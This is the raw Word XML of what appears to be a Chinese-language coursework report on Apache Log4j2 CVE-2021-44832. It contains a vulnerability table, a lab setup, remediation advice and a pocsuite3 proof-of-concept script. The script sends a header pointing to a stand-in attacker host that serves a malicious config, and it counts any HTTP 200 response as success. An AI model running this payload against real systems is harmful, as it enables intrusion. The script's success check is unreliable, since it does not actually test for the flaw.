          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="34" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/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结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="4C5DAA69">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="5DDB5628">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>log4j2_cve-2021-44832_poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA9C1C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="2B87BEFE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15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 w14:paraId="738F1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3120A09">
            <w:pPr>
              <w:pStyle w:val="21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D40B6A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247755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40A5B1E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58B3FD7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Apache Log4j2 远程代码执行漏洞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75F5C90"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4C3BCB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CVE-2021-44832</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51904B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71DD071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CA28A05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2021-12-28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DA3E628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E6326E3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107536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5A29E31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1C8727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CNNVD-202112-2069</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5E5FCE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13A40B87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2015E1D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2021-12-28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BA1D47E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A919E4F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Sergey Zhelezov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C2C6E34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ED895C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CNVD-2021-101871</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4B5E24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661C721B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F5C6215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110A915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F984D65">
            <w:pPr>
              <w:pStyle w:val="21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Apache Software Foundation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437DE14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2AF1BE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CVE-2021-44832, Apache Log4j2, Remote Code Execution, RCE, JNDI Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2376AA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4E9EB574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5B25EF4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Apache Log4j 2.0-beta9 到 2.17.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FC96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C808506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9FFB958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Apache Software Foundation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E6391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3D972E4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3764E1"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CVE-2021-44832 是 Apache Log4j2 中的一个远程代码执行漏洞，通过恶意的 JNDI 加载触发。在特定配置文件条件下，未经身份验证的远程攻击者可以利用此漏洞执行任意代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6AB35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FB793A9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9B3096">
            <w:pPr>
              <w:pStyle w:val="21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该漏洞存在于 Apache Log4j2 的配置文件处理过程中。攻击者可以通过提供恶意配置文件，其中包含恶意 JNDI 加载配置。当 Log4j2 读取并执行该配置文件时，会触发远程代码执行漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="076E9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7C137868">
            <w:pPr>
              <w:pStyle w:val="21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DA4B717">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/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"https://nvd.nist.gov/vuln/detail/CVE-2021-44832" \t "_new" </w:instrText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8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NVD - CVE-2021-44832</w:t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 w14:paraId="6D4D6A8F">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/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CNNVD - CVE-2021-44832</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2CCB2D">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pP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"https://logging.apache.org/log4j/2.x/security.html" \t "_new" </w:instrText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8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Apache Log4j Security Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr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459FF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50545E1D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12E8A7">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="17"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>靶机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>: Kali Linux (192.168.200.12)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA09719">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="17"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>: 用于启动 JNDI Exploit 和托管恶意配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C713821">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="07608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1D202A4D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42B3140">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>from pocsuite3.api import POCBase, Output, register_poc, requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E5F4D7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>class Log4j2POC(POCBase):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vulID = 'CVE-2021-44832'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version = '1.0'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author = 's'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vulDate = '2021-12-28'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createDate = '2021-12-28'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updateDate = '2021-12-28'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references = ['https://logging.apache.org/log4j/2.x/security.html']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name = 'Log4j2 RCE via configuration'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appPowerLink = 'https://logging.apache.org/log4j/2.x/'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appName = 'Log4j2'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appVersion = '2.0 &lt;= Log4j &lt;= 2.17.0'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vulType = 'Remote Code Execution'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desc = 'Log4j2 remote code execution vulnerability via configuration file'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def _verify(self):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result = {}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url = self.url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headers = {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"User-Agent": "Mozilla/5.0",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"X-Log4j-Config": "http://attacker.com:8080/log4j2.xml"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}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try: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response = requests.get(url, headers=headers, timeout=10)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if response.status_code == 200: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    result['VerifyInfo'] = {}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    result['VerifyInfo']['URL'] = url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    result['VerifyInfo']['Response'] = response.text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except requests.exceptions.RequestException as e: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result['error'] = str(e)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return self.parse_output(result)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def _attack(self):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return self._verify()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def parse_output(self, result):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output = Output(self)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if result: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output.success(result)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else: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    output.fail('Target is not vulnerable')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 xml:space="preserve">        return output</w:t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18"/>
              </w:rPr>
              <w:t>register_poc(Log4j2POC)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB2CCC0">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35AFFA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3BA7858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855D9A8">
            <w:pPr>
              <w:spacing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</w:rPr>
              <w:t>升级 Log4j: 升级到 Log4j 2.17.1 或更高版本。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F61B50">
            <w:pPr>
              <w:spacing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</w:rPr>
              <w:t>使用安全的 JNDI 解析器: 避免使用不受信任的远程 JNDI 据源。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372DF1A5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:rPr>
              <w:t>配置文件安全性: 确保 Log4j 配置文件的来源是可信的，并且避免加载来自不可信来源的配置文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E71F6F1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E42A312"/>
    <w:p w14:paraId="5C29F5A2"/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11A95">
    <w:pPr>
      <w:pStyle w:val="8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4755C">
                          <w:pPr>
                            <w:pStyle w:val="8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56+Us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/nr5S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04755C">
                    <w:pPr>
                      <w:pStyle w:val="8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66E69">
    <w:pPr>
      <w:pStyle w:val="9"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts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4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA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8D7AD3A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="78D7AD3A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5D969B9"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="22952C4B"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="2C03037A"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4BF27220"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="51EE640D"/>
    <w:rsid w:val="54517EE5"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="60A2320D"/>
    <w:rsid w:val="67E55CDC"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="70551770"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85C56"/>
    <w:rsid w:val="7F8F5D86"/>
    <w:rsid w:val="DE7DC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Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20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1">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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22">
    <w:name w:val="WPSOffice手动目录 1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3">
    <w:name w:val="WPSOffice手动目录 2"/>
    <w:autoRedefine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1296</Words>
  <Characters>3096</Characters>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3611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2021-07-06T13:38:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>怀.瑾.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27T05:51:57Z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5472C614D2BD4699912FDBFD7DE1E655_13</vt:lpwstr>
  </property>
</Properties>
</file>